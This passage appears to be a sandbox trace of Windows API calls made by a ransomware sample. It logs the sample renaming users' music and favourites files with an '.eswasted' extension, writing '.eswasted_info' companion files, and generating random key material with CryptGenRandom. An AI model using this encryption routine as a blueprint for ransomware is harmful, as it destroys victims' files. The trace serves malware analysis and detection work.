lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.343] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.343] lstrcpyW (in: lpString1=0x6f6658, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.eswasted")) returned 1 [0078.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.344] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0078.345] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.345] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.345] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.345] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.346] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.346] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.373] SetEndOfFile (hFile=0x124) returned 1 [0078.375] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.375] CloseHandle (hObject=0x124) returned 1 [0078.377] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65b8 | out: hHeap=0x6d0000) returned 1 [0078.377] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0078.377] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.377] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0078.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0hcCi9s-My.m4a") returned 54 [0078.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x276) returned 0x6f5cc0 [0078.378] lstrcpyW (in: lpString1=0x6f5d2c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.378] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.378] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0078.379] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.379] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0078.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0hcCi9s-My.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0hcci9s-my.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.379] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.380] SetEndOfFile (hFile=0x124) returned 1 [0078.380] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.381] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.381] lstrcpyW (in: lpString1=0x6f5d2c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0hcCi9s-My.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0hcci9s-my.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0hcCi9s-My.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0hcci9s-my.m4a.eswasted")) returned 1 [0078.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0hcCi9s-My.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0hcci9s-my.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.381] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.383] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f0e0) returned 1 [0078.384] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.384] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0078.384] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f0e0) returned 1 [0078.385] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.385] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0078.393] SetEndOfFile (hFile=0x124) returned 1 [0078.396] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.396] CloseHandle (hObject=0x124) returned 1 [0078.397] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.397] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0078.398] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.398] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0078.398] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6f_sby_WnBr2CN.mp3") returned 58 [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x6f5cc0 [0078.398] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.398] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.398] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0078.399] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.399] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0078.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6f_sby_WnBr2CN.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6f_sby_wnbr2cn.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.504] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.505] SetEndOfFile (hFile=0x124) returned 1 [0078.505] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.505] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.505] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6f_sby_WnBr2CN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6f_sby_wnbr2cn.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6f_sby_WnBr2CN.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6f_sby_wnbr2cn.mp3.eswasted")) returned 1 [0078.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6f_sby_WnBr2CN.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\6f_sby_wnbr2cn.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.506] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0078.506] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.507] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.507] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.507] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.508] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.508] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.516] SetEndOfFile (hFile=0x124) returned 1 [0078.519] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.519] CloseHandle (hObject=0x124) returned 1 [0078.521] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.521] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.522] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.522] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fm4VzqJs XStB.wav") returned 57 [0078.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0078.522] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.522] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.522] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.523] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.523] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fm4VzqJs XStB.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm4vzqjs xstb.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.524] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.525] SetEndOfFile (hFile=0x124) returned 1 [0078.525] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.525] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.525] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fm4VzqJs XStB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm4vzqjs xstb.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fm4VzqJs XStB.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm4vzqjs xstb.wav.eswasted")) returned 1 [0078.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fm4VzqJs XStB.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fm4vzqjs xstb.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.526] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.528] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.528] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.528] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.529] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.529] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.530] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.540] SetEndOfFile (hFile=0x124) returned 1 [0078.542] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.543] CloseHandle (hObject=0x124) returned 1 [0078.544] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.545] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.545] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.545] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jYgA_0.m4a") returned 50 [0078.545] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26e) returned 0x6f5cc0 [0078.546] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.546] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.546] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.546] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.546] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jYgA_0.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jyga_0.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.547] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.548] SetEndOfFile (hFile=0x124) returned 1 [0078.548] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.549] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.549] lstrcpyW (in: lpString1=0x6f5d24, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jYgA_0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jyga_0.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jYgA_0.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jyga_0.m4a.eswasted")) returned 1 [0078.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jYgA_0.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jyga_0.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.615] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0078.616] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.617] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0078.617] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.617] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.618] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.618] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.628] SetEndOfFile (hFile=0x124) returned 1 [0078.631] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.631] CloseHandle (hObject=0x124) returned 1 [0078.633] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.634] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.635] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.635] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QkH1Reb_X2gySKE15zK.m4a") returned 63 [0078.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x6f5cc0 [0078.635] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.635] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.635] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.636] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.636] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QkH1Reb_X2gySKE15zK.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qkh1reb_x2gyske15zk.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.637] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.638] SetEndOfFile (hFile=0x124) returned 1 [0078.638] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.638] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.638] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.638] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QkH1Reb_X2gySKE15zK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qkh1reb_x2gyske15zk.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QkH1Reb_X2gySKE15zK.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qkh1reb_x2gyske15zk.m4a.eswasted")) returned 1 [0078.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QkH1Reb_X2gySKE15zK.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qkh1reb_x2gyske15zk.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.639] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.640] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.641] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0078.641] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.641] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.642] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.642] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.654] SetEndOfFile (hFile=0x124) returned 1 [0078.656] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.656] CloseHandle (hObject=0x124) returned 1 [0078.659] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.659] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.707] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.707] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rJYIzEx.mp3") returned 51 [0078.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x71ec18 [0078.707] lstrcpyW (in: lpString1=0x71ec7e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0078.707] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.708] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0078.708] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rJYIzEx.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rjyizex.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.709] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 